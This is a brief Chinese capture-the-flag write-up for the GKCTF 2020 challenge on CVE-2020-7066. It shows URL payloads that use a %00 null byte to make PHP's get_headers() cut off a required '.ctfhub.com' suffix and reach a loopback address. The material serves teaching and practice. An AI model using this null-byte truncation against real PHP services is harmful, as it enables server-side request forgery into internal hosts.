本文主要是介绍[GKCTF 2020]cve版签到,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
通过题目的提示可知,这是一个CVE(cve-2020-7066)的复现
点击进之后也无回显
看了这个cve之后,知道这个cve就是这个get_headers()会截断URL中空字符后的内容
就根据cve的提示,可以利用%00来截断后面url的内容
题目中给出了url的结尾必须为.ctfhub.com
那么我们可以构造payload
http://1.14.71.254:28532/?url=http://127.0.0.1%00.ctfhub.com
根据提示后面必须为123,修改payload
1.14.71.254:28532/?url=http://127.0.0.123%00.ctfhub.com
得到flag
这篇关于[GKCTF 2020]cve版签到的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!